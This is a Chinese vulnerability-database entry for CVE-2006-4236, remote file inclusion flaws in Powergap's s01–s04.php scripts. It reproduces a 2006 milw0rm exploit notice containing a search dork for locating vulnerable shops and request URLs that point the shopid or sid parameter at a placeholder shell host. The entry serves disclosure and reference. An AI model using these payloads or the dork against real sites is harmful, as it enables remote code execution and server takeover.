Powergap多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110842 漏洞类型 输入验证
发布时间 2006-08-17 更新时间 2006-10-18
CVE编号 CVE-2006-4236 CNNVD-ID CNNVD-200608-317
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2201
https://cxsecurity.com/issue/WLB-2006080126
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-317
|漏洞详情
POWERGAP中存在多个PHP远程文件包含漏洞,远程攻击者可借助提交到:a)s01.php,(b)s02.php,(c)s03.php和(d)s04.php脚本中的shopid参数中的URL;也可能是PATH_INFO中"shopid="或"sid="之后的URL,来执行任意PHP代码。
|漏洞EXP
#=================================================================
#powergap <= (s0x.php) Remote File Inclusion Exploit
#================================================================
#                                                                   
#Critical Level : Dangerous                                 
#                                                                   
#Venedor site : http://www.powergap-shop.de   
#                                                                   
#http://www.demo-shop.com                           
#                                                                   
#=================================================================
#
#Dork: "powergap" or "s04.php" or s01.php or s02.php
#
#=================================================================
#Bug in : s01.php
#or s02.php
#or s03.php
#or s04.php
#
#
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/s01.php?shopid=http://SHELLURL.COM?
#http://sitename.com/s01.php?shopid=http://SHELLURL.COM?
#http://sitename.com/s02.php?shopid=http://SHELLURL.COM?
#http://sitename.com/s03.php?shopid=http://SHELLURL.COM?
#http://sitename.com/s04.php?shopid==http://SHELLURL.COM
#   or
#http://sitename.com/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://SHELLURL.COM
#http://sitename.com/sid=http://SHELLURL.COM
#===============================================================================
#Discoverd By : Saudi Hackrz
#
#Conatact : Saudi.unix[at]hotmail.com
#
#GreetZ : SnIpEr_Sa. Alarraab. SHiKaA. King18
#www.3asfh.net
=================================================================

# milw0rm.com [2006-08-17]
|参考资料

来源:XF
名称:powergap-shopid-file-include(28425)
链接:http://xforce.iss.net/xforce/xfdb/28425
来源:BID
名称:19565
链接:http://www.securityfocus.com/bid/19565
来源:BUGTRAQ
名称:20060817powergap<=(s0x.php)RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/443469/100/0/threaded
来源:OSVDB
名称:29500
链接:http://www.osvdb.org/29500
来源:OSVDB
名称:29499
链接:http://www.osvdb.org/29499
来源:OSVDB
名称:29498
链接:http://www.osvdb.org/29498
来源:OSVDB
名称:29497
链接:http://www.osvdb.org/29497
来源:OSVDB
名称:29496
链接:http://www.osvdb.org/29496
来源:MILW0RM
名称:2201
链接:http://www.milw0rm.com/exploits/2201
来源:SECTRACK
名称:1016715
链接:http://securitytracker.com/id?1016715
来源:SREASON
名称:1417
链接:http://securityreason.com/securityalert/1417
来源:MILW0RM
名称:2201
链接:http://milw0rm.com/exploits/2201